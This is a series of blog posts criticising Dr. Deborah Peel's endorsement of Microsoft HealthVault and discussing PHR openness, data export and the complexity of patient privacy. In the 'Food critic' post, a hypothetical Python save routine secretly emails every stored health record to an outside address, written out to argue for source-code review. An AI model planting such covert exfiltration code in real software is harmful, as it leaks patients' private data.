Meeting Dr. Peel

Medsphere and the Shreeve Tragedy have left me a little jaded. I have little patience for those who threaten the health FOSS community. Believe it or not, I rarely allow my aggression to turn public. I can think of at least 5 friendships with current FOSS community members that began with rather nasty emails originating from me. Most of these useful harassments never make it into the public eye. The work that Dr. Peel has done with Microsoft around their HealthVault line has been a notable exception. Dr. Peel's public endorsement of Microsoft originally shocked me so greatly that I felt I had to publicly respond.

So it was with great anticipation that I heard Dr. Peel speak for the very first time today at HIMSS 08. In her talk, she indirectly addressed many of my criticisms. Let's review some of the “potshots” that I have taken at her, and detail what I heard in her talk about these issues.

Dr. Peel detailed her plans to create a new organization to perform privacy reviews of PHR sourcecode and privacy policies.

Apparently the new certifying organization will not certify PHR systems without performing a sourcecode review.

Obviously, through the new certifying organization, the “endorsement” of Microsoft would become a formal matter. The endorsement would be withdrawn if Microsoft started behaving badly.

I wish that I could believe that Dr. Peel started these initiatives in response to my criticisms (it would make me feel very important indeed to know that she was listening); however, it is entirely possible that she had this plan in her organization's skunk works long before I was saying anything.

Here are some further snippets that I found comforting from her presentation.

  • She claimed that she has not taken any money from Microsoft; she gets her funds from her own network of friends and supporters. (Transparency is good.)
  • When I asked about the clause in Microsoft's privacy policy that specifically gave permission for Microsoft to off-shore data storage, she immediately replied that she thought that was totally unacceptable.
  • While she listed Microsoft's HealthVault as a “good” project, she also listed Microsoft on the pages of privacy violators, so she both endorsed and condemned them in the same talk.
  • She talked to me after her talk and was quite friendly.

The only thing I could criticize about her talk specifically was her slide about the VA data thefts. She had put a WorldVistA logo at the top of the page, but the data breaches were a problem within the VA and had nothing to do with WorldVistA. WorldVistA is a private organization that shares an interest in VistA with the VA, but is otherwise not connected with the VA at all, and certainly had nothing to do with the data breaches. In fact, WorldVistA has improved, and will continue to improve, the overall privacy and security of private installations of VistA. Still, I am probably the only person in the crowd who even noticed this, and I doubt anyone thinks negatively about WorldVistA as a result of her talk.

In short, Dr. Peel is probably going to address the bulk of my complaints. She may have been planning to for months before I said anything.

So this is not a retraction of my attacks against her, but rather a reprieve. (When someone turns around like this, a reprieve from criticism is common within our community.) If she continues on this path, I will fully retract my criticisms of her personally.

Also note that, despite the fact that HealthVault has surprised me recently, it has NOT earned a reprieve yet. That may happen in a following post. There seem to be some changes in the privacy policy, and there has been some movement towards openness. HealthVault has invited me to engage them in person, and I plan to do that before the conference is over. I am hopeful.

-FT

HealthVault: becoming un-Microsoft?

What I read this morning almost made me choke on my Cheerios.

Neil Versel (one of the most in-the-loop Health IT journalists I know) turned me on to a blog post from Sean Nolan that I obviously did not want to miss. The post, aptly titled Opening up the Vault, revealed several important claims:

  • Microsoft is releasing a Java wrapper library under the OSI-approved Microsoft Public License
  • Microsoft is releasing some .NET code under a read-only license (i.e. not open source)
  • Most importantly, Microsoft is releasing the entire HealthVault XML interface specification under the Microsoft Open Specification Promise

I need to research the Microsoft Open Specification Promise; to say the least, there appears to be some confusion as to its legitimacy for FOSS developers. I have a “call” into the Software Freedom Law Center to see what their current evaluation of the promise is. Still, the significance of this should not be underestimated. Sean claims:

“With this information, developers will be able to reimplement the HealthVault service and run their own versions of the system.”

Don’t get me wrong, I trust Microsoft about as far as I can throw them (all of them… at once), but this is definitely a step in the right direction. It will take me some time to sort out just how meaningful a step.

This is a smart time to do this, too. There is something like a 90% probability that Google will be officially announcing its PHR effort at HIMSS. (Heck, it's been leaked already.) By releasing an API, Microsoft is essentially challenging Google to do the same, and that could mean that hacktivists like myself could build arbitrary bridges between the two (now this is hopeful…), which would mean that Google's and Microsoft's systems would compete on merit rather than on most-effective-lock-in.

-FT

HealthVault Response: Lucid comments from Fred Fortin

The World Healthcare Blog recently had a post that quoted a portion of a post from my HealthVault series. In the post, titled What Will Patients Expect in the Completeness of Their Electronic Medical Records?, Fred Fortin extends my comments about the complexity of patient privacy with some lucid questions about the implications of trusting a meta-EHR system like HealthVault. Since he quoted me, I will quote him back :)

“Either by design, incompatibility, law, or systems failure, something will be missing (from the HealthVault record). Will it be important information? Who knows. But the public, as it has with banks, credit cards and other electronic dependencies, may believe it to be complete. They may, in fact, have a view of EMRs that is more in line with the industry’s marketing image than with the intricacies or record-keeping reality.”

Worth a read! It is satisfying to know that I am making people think and comment.

HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr. Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel's bio; she has done an impressive amount of medicine and privacy activism. At least on this bio, she lists no formal computer science training. On the same page we find the bios of the other members of the Patient Privacy Rights board. Please note especially the bio of Tina Williamson (use this link, as the one on the bio page is broken), who was formerly the Vice President of Marketing for a dot com company. That work should count as negative experience for judging whether marketing claims match sourcecode. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope, no computer-science-trained staff there.

According to the Patient Privacy Rights website, there is no competent electronic security or privacy expert with actual computer science training associated with the Patient Privacy Rights organization. But remember, the Privacy Coalition is much more than just the Patient Privacy Rights group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Deborah Peel's recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumer's healthcare record.

Of the 45 organizations (which are probably great organizations…), only three are technology-oriented. One of them is a meta blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, and I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are the Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR).

From what I can tell, the most technically impressive person at EPIC is Simon Davies; the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peel's recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement; instead, it sounds like the typical statement of someone who recognizes the depth of complexity involved. I doubt that Dr. Peel's technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently led by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them, but so far it does not seem like they were consulted. Fyodor's first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy, or without consulting someone who had it? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be the utmost hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommend specific drugs to a mental health patient, despite the fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I were forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around a lot, something with a big name that made me and my patients feel more comfortable. 8 times out of 10 my prescription might work fine, but I would have no idea why it did not work the other 2 times, no idea how to determine whether it was working or not, and no idea what to do to fix it. I have a four-year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding drug impact to something like 98% accuracy takes about a decade (not to mention the time required for board certification). Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine whether it matches high-level privacy guidelines. Based on my personal experience, it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training, I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume to move outside of my area of expertise to make any clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait: having expertise in medicine does not exclude expertise in Computer Science generally or electronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board certified psychiatrist also has a master's in Computer Science? What happens when the same person spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns that I am raising. Many of Microsoft's experts have experience equivalent to Dr. Valdes' training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy, endorsing a company with arguably the worst security and privacy track record ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be well past her technical depth.

Of course I could be wrong. I have not seen Dr. Peel's vita. If Dr. Peel will publish her full resume, and it contains solid computer-science-based privacy training and experience that she has left off of her online biography, I will be happy to retract some of these criticisms. The only thing that could justify Dr. Peel's endorsement is a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful, it would be good for Microsoft's bottom line but terrible for our culture. Indeed, Dr. Peel is right about one thing: Microsoft would be “leading” us. Those wearing shackles are often led by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refuses to budge.

We need to write a tool, using the Microsoft HealthVault API, to export the data from HealthVault. Preferably this should export to a standard format, but comma-delimited is better than nothing.
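To make this concrete, here is a rough sketch of what such an export tool might look like. The endpoint URL, the request format, and the XML element names below are placeholders I made up for illustration; the real HealthVault interface documentation (and its authentication requirements) would have to replace them before any of this could actually run.

```python
# Rough sketch of a HealthVault export tool. The URL, the "GetThings" method
# name, and the XML element names are assumptions for illustration only --
# they are NOT taken from the real HealthVault specification.
import csv
import xml.etree.ElementTree as ET

import requests  # real HealthVault calls would also need proper auth headers

PLATFORM_URL = "https://platform.healthvault.example/platform"  # placeholder endpoint


def fetch_record_xml(record_id: str, auth_token: str) -> str:
    """Request every item in a record as raw XML (hypothetical request format)."""
    request_body = f"""<request>
        <auth-token>{auth_token}</auth-token>
        <record-id>{record_id}</record-id>
        <method>GetThings</method>
    </request>"""
    response = requests.post(PLATFORM_URL, data=request_body, timeout=30)
    response.raise_for_status()
    return response.text


def export_to_csv(record_xml: str, out_path: str) -> None:
    """Flatten each <thing> element into one CSV row: id, type, date, raw payload."""
    root = ET.fromstring(record_xml)
    with open(out_path, "w", newline="") as handle:
        writer = csv.writer(handle)
        writer.writerow(["thing-id", "type", "effective-date", "raw-xml"])
        for thing in root.iter("thing"):  # element name is an assumption
            writer.writerow([
                thing.findtext("thing-id", default=""),
                thing.findtext("type-id", default=""),
                thing.findtext("eff-date", default=""),
                ET.tostring(thing, encoding="unicode"),
            ])
```

Comma-delimited output is the floor, not the ceiling; the same flattening step could just as easily target CCR or another standard format once the raw XML is out of the vault.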

If you are an investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me… I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code, (which you should not) you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing sourcecode, Microsoft would ensure that the software could be run without Microsoft's help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing consumers to download their data in a standard format, Microsoft would ensure that the data would not be trapped in a proprietary format.

Recently, Microsoft released two licenses that have been approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowball's chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely saying “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion, you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally, all of the “Patient Privacy Principles” have this problem. They are great principles, but when you get deeper, to the level that is required when implementing software, it is obvious that they are only useful in spirit. For instance:

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good, right? But does that mean that you will require consent to inform the employer of a workers' compensation injury status? Doesn't the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly, does informed consent mean? When was the last time you started a new job and did not sign all fifteen of the CYA forms that your employer put in front of you? Does that count as informed consent? Again, the spirit of the principle here is obviously good, something like “employers should not be able to discriminate against employees based on health information,” but that does not cut it when making software. We have to determine exactly what the system will do and what it will not do in order to write software.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peel's endorsement of Microsoft's HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry? You see the roasted turkey browned to perfection, with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs; they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready, the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” using a paint remover gun. The pat of butter… well, let's just say it's not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or to Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent Computer Scientist would acknowledge that this is trivially true: obviously it is not what Microsoft says that matters, nor is it what the software appears to do! What matters is what the software actually does, and the only way to determine this, one way or another, is to read the sourcecode. There is a long and glorious tradition in the software industry of, shall we say, “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this gap between sourcecode and marketing material? More on this issue later.
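To see why only sourcecode settles the question, consider this purely hypothetical sketch of a save routine. Every name in it is invented for illustration; the point is simply that the extra disclosure lives entirely in code the user never sees, so no amount of staring at the interface would reveal it.

```python
# Purely hypothetical illustration: a "save" routine whose visible behavior is
# identical whether or not the emailing code below is present. Nothing in the
# user interface, the demo, or the marketing material would reveal the extra
# disclosure; only reading the sourcecode would.
import smtplib
from email.message import EmailMessage


def save_health_record(record_id: str, payload: str, database) -> None:
    """Store the record, exactly as the user interface promises."""
    database.store(record_id, payload)  # the part the interface shows you

    # The lines below are the kind of thing a brochure, a privacy policy,
    # and a product demo would never show you:
    msg = EmailMessage()
    msg["To"] = "somebody-else@example.com"
    msg["From"] = "phr@example.com"
    msg["Subject"] = f"Copy of record {record_id}"
    msg.set_content(payload)
    with smtplib.SMTP("mail.example.com") as smtp:
        smtp.send_message(msg)
```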

-FT

HealthVault Comments: Deepak Singh replies

I try to keep up with other coverage of HealthVault, and doing so led me to watch a video produced by mndoci on YouTube. I contacted the author, Deepak Singh, and asked him if he would do a YouTube video in response to my HealthVault articles. I have been thinking about trying a video post, but have been afraid to take the plunge; now I can see how videos work on this blog by posting Deepak's video directly here.

The video is a great help to me. I often feel that my writing is clear and concise. I usually feel this way until I actually talk to a reader, whose questions and criticisms make it clear that I was not so clear after all. Clarity, apparently, requires hindsight, and sometimes humiliation. I will be posting more about the blogosphere's reaction to my HealthVault articles soon. I will be making some changes to make my articles better afterward, so if you are interested in reading version 0.1 of my thinking on this, better get it now.

-FT

Privacy, a Complex Problem Underestimated.

I have passed my CISSP certification, marking me as an Information Security Expert. I had to pass a complex test and demonstrate that I had three years of full-time security experience to become CISSP certified. I have a four-year degree in Computer Science, and I have been trained in Information Warfare by the United States Air Force at the Air Force Information Warfare Center in San Antonio. I have been trained in physical security by the United States Marine Corps (Hoorah). I have worked in Healthcare IT Security for over 5 years now. Frankly, I find the issue of Health Information Security to be extremely complex. Here are examples of the thorny issues that I face as a professional. (This article was originally written about HealthVault, but it applies so broadly that I removed HealthVault from the title on 10-04-11.)

There are various State and National laws that govern the disclosure of HIV or AIDS status. These often mean that portions of medical records must operate under different disclosure rules based on whether they reveal a person's HIV status. For instance, imagine a physician discussing a patient with AIDS in the notes section for that patient:

“It would be good if Patient X could maintain their exercise regime. However, given his level of immune function, Patient X should stay away from public gymnasiums, which can be unsanitary. I recommend any kind of constant aerobic activity, three times a week for at least 30 minutes each.”

Normally a message like this would be ideal for a PHR to pass to a personal trainer; however, the middle sentence arguably reveals the HIV status of the patient. There is no mention of the terms “HIV” or “AIDS,” so a simple text search of the document could not easily determine that it was associated with HIV status. Yet this piece of patient information should be treated differently. The level of awareness that a PHR would need in order to determine that the note above is related to HIV status is equivalent to human intelligence. The PHR would need to understand English to such a high degree that it would be very close to passing the Turing Test.
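A tiny sketch makes the point. The keyword list and the filter below are my own strawman, not anything a real PHR uses, but they show how the note above sails straight past a naive text search:

```python
# A minimal sketch of why simple keyword screening fails. The note never uses
# the words "HIV" or "AIDS", so the filter waves it through even though the
# middle sentence effectively discloses the patient's status.
SENSITIVE_TERMS = {"hiv", "aids", "immunodeficiency"}

note = (
    "It would be good if Patient X could maintain their exercise regime. "
    "However, given his level of immune function, Patient X should stay away "
    "from public gymnasiums, which can be unsanitary. I recommend any kind of "
    "constant aerobic activity, three times a week for at least 30 minutes each."
)


def looks_sensitive(text: str) -> bool:
    """Flag text only if it contains one of the obvious keywords."""
    lowered = text.lower()
    return any(term in lowered for term in SENSITIVE_TERMS)


print(looks_sensitive(note))  # False -- the disclosure slips right past the filter
```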

The alternative, of course, is to have a person validate every piece of data to see if it reveals HIV status for patients whose PHR records are tagged as HIV positive. But how many records could such a custodian hope to manage? What level of human error would be acceptable from such a custodian? Assuming all the records were correctly tagged, how could a human accurately review thousands of medical data points in a given record?

But even those issues ignore the problem of who tags a record with HIV status. Perhaps the patient should be in charge of tagging the account with HIV status, so that automated systems could attempt to handle the rest. But what if a patient wants to withhold that status from the PHR?

What about family planning and pregnancy status? Physicians must be very careful to follow local laws to know to what extent a patient's parents can be informed about their under-aged daughter's reproductive condition. However, any other medical condition would obviously be under the purview of the child's parents or guardians.

There are also cases where the patients themselves cannot access their own records. Many psychiatric records must be protected in this manner.

Can a patient remove the information that they have diabetes from their own record? Can they remove their allergy to penicillin? What if they removed it by accident? If patients can accidentally remove data, or can remove a diagnosis or allergy that they do not like, how can a physician or other healthcare provider rely on the contents of the PHR? If a physician knows that they cannot rely on the contents of the PHR, why would they bother to add information themselves? If physicians do not add information to the PHR, why should its contents be trusted? Electronic trust is tricky.

If the patient cannot totally control every aspect of the record, does the patient really own the record? Does the healthcare provider own the record, even though the law often compels providers to produce and distribute a patient's record?

How much information should payers (insurance companies, etc.) be able to see? Payers certainly must be made aware of the procedures that they will be paying for, but they should not be given so much information that they can discriminate inappropriately.

Let's sum up. Medical records belong to the patient, except when they don't. They should be accessible to the patient, except when they shouldn't. The records of minors are always open to their guardians, except when they are closed. Segmenting data in order to protect portions of health information is currently an intractable problem of free-text analysis. Tagging patient records with critical information is difficult. Trust is far more complex than it first seems. Finally, patients should be allowed to “control” their own record, except when that control would allow them to do something that would invalidate the record.

This is just a taste of the kinds of problems that I have run across during my career as a health information privacy professional. Notice that a deep understanding of several of these problems requires enough Computer Science know-how to understand why free-text analysis is a difficult problem. The other problems require at least a shallow understanding of medico-legal issues, which seems simple until you consider how you are going to design a PHR or EHR to meet these requirements.

How do you design a PHR so that “control” can be so finely parsed? How do you put the doctor in charge sometimes, the patient in charge other times (except to undo what the doctor did), the teenage daughter in charge, for only one of her medical issues, in such a way that her parents are not informed about that one medical issue, but are in charge of everything else?
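To show just how finely that machinery has to be parsed, here is a bare-bones sketch of one way the per-item rules might be modeled. Every class and field name is mine, invented for illustration rather than taken from any real PHR:

```python
# A sketch of one way to model per-item access rules; all names are invented
# for illustration. Each record item carries its own policy, so a guardian can
# see everything except the one issue that local law walls off.
from dataclasses import dataclass, field


@dataclass
class AccessPolicy:
    readers: set = field(default_factory=set)   # roles allowed to view the item
    editors: set = field(default_factory=set)   # roles allowed to change the item
    patient_can_delete: bool = False            # e.g. False for allergies and diagnoses


@dataclass
class RecordItem:
    description: str
    policy: AccessPolicy


def can_read(item: RecordItem, role: str) -> bool:
    """Return True only if the role appears in the item's own reader list."""
    return role in item.policy.readers


# The teenage-daughter scenario from the paragraph above:
reproductive_care = RecordItem(
    "contraception consult",
    AccessPolicy(readers={"patient", "physician"}, editors={"physician"}),
)
broken_arm = RecordItem(
    "fracture follow-up",
    AccessPolicy(readers={"patient", "guardian", "physician"}, editors={"physician"}),
)

print(can_read(reproductive_care, "guardian"))  # False: parents are not informed
print(can_read(broken_arm, "guardian"))         # True: they manage everything else
```

Even this toy version dodges the hard parts: who sets the policy, who can change it, and how the law in a given state maps onto those sets.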

In short, “patient privacy” is a very, very complex problem that requires some pretty high-level thinking and is pretty easy to mess up. When you see someone pretending that there is a simple solution to these problems, you should be very suspicious.